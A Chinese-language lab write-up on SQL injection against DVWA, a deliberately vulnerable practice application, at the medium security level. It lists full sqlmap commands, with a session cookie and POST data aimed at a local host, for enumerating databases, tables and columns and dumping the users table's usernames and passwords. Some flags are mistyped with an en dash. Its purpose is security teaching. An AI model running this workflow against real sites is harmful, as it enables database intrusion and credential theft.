DVWA--sql注入(工具注入)

实验环境：

配置DVWA平台。

进入DVWA平台，选择DVWA Security，将安全级别设置为Low。

点击SQL Injection，进入测试页面。

（1）判断注入点。

（2）列出所有的数据库

（3）列出当前数据库

（4）列出DBname数据库所有的表

（5）列出DBname数据库table表中的所有列

（6）导出DBname数据库table表中指定列的数据。

任务2：尝试用sqlmap对SQL Injection的中级进行注入，写出实验步骤。

（注意：中级为post方法，--data数据以POST方式提交，-p 指定参数）

注入点

sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/#"  --cookie="security=medium;PHPSESSID=lb2pakbedinc0cj246lij26m80" --data="Submit=Submit&id=1" --batch -p "id" 

数据库

sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/#"  --cookie="security=medium;PHPSESSID=lb2pakbedinc0cj246lij26m80" --data="Submit=Submit&id=1" --batch -p "id"  --dbs

sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/#"  --cookie="security=medium;PHPSESSID=lb2pakbedinc0cj246lij26m80" --data="Submit=Submit&id=1" --batch -p "id"  --current-db

表

sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/#"  --cookie="security=medium;PHPSESSID=lb2pakbedinc0cj246lij26m80" --data="Submit=Submit&id=1" --batch -p "id"  -D dvwa –tables

列

sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/#"  --cookie="security=medium;PHPSESSID=lb2pakbedinc0cj246lij26m80" --data="Submit=Submit&id=1" --batch -p "id"  -T users –columns

表中数据

sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/#"  --cookie="security=medium;PHPSESSID=lb2pakbedinc0cj246lij26m80" --data="Submit=Submit&id=1" --batch -p "id"  -T users -C "user,password" –dump